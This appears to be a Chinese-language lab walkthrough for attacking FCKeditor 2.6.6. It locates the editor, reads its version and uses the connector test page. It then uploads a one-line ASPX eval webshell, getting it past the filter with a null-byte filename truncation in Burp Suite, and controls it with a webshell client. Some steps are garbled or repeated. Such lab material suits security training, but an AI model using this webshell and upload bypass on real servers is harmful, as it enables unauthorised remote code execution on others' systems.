FckEditor 2.6.6 上传

在操作机上使用 FireFox 等 Web 浏览器访问目标服务器（示例 IP 地址为：100.100.0.16）的如下网页 URL 地址：http://100.100.0.16/EditNews.html

在页面中可以发现内嵌了一个网页编辑器。查看当前页面/框架的源代码，以 Firefox 浏览器为例，右键选择“查看页面源代码

从中可以找到fckeditor的url路径为 http://100.100.0.16/fckeditor/  

访问此路径

由此可知，该FckEditor的路径是可用的。在访问过程没有404,500等http状态码的提示

---

操作机使用 Firefox 浏览器访问如下 URL 地址：http://100.100.0.16/fckeditor/_whatsnew.html

　由更新记录信息可知，目标 FckEditor 的版本为2.6.6

---

操作机使用火狐浏览器访问如下 URL 地址来打开 FCKEditor 连接器（connectors）的测试页面：http://100.100.0.16/fckeditor/editor/filemanager/connectors/test.html

在“Connector”下拉框中选择“ASP”，“Resource Type”下拉框中选择“File”，“Current Folder”中保持默认的“/”（表示根目录）。

---

在操作机中，创建一个一句话 ASPX Webshell文件，保存为“hongya.aspx”，文件内容为：

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

注：可以自定义Webshell的密码，这里默认为“pass”。

此文件带是。txt后缀

---

点击“浏览”-----选中上传的文件后----点击“upload”，可以发现上传成功。

　　这里fckeditor对文件正常识别，并可以解析。所有可以上传成功。

---

点击“Get Folders and Files”后可以发现txt文件的路径等消息。如果我们上传木马等攻击文件成功后，也会在这里显示。

---

然后用burpsuit-------略

---

回到FCKEditor连接器（connectors）的测试页面，再次选择“hongya.aspx”文件上传：

这时候，切换到Burpsuite中，我们就可以发现浏览器的登录请求数据包已经被Burpsuite拦截了下来，并且完整的显示在界面之中

 Burpsuite 的数据包显示界面中点击右键，选择菜单项“Send to Repeater”

切换到Burpsuite的“Repeater”选项卡

---

接下来，我们需要手动将“filename”这个变量的值“hongya.aspx”修改为“hongya.aspx□txt”（“□”代表0x00 这个字符串截断符） 　　首先将“hongya.aspx”修改为“hongya.aspx%00txt”，如下图所示：

中“%00”，点击右键，选择菜单项“Convert selection”→“URL”→“URL-decode”，解码后的“filename”就如下图所示：

---

然后go 自动更新自己添加东西后的字符

从右侧响应数据包的200 OK状态可知请求成功完成

---

在 FCKEditor 连接器（connectors）测试页面中点击“Get Folders and files”链接，关闭burp suite软件的拦截功能，然后在浏览器页面中可以看到列举当前目录下的所有子目录和文件信息，如下图所示：

---

使用操作机Web 浏览器访问如下Webshell的 URL 地址：http://100.100.0.16/userfiles/file/hongya(1).aspx 使用操作机Web 浏览器访问如下Webshell的 URL 地址：http://100.100.0.16/userfiles/file/hongya(1).aspx

---

最后，打开菜刀，进后台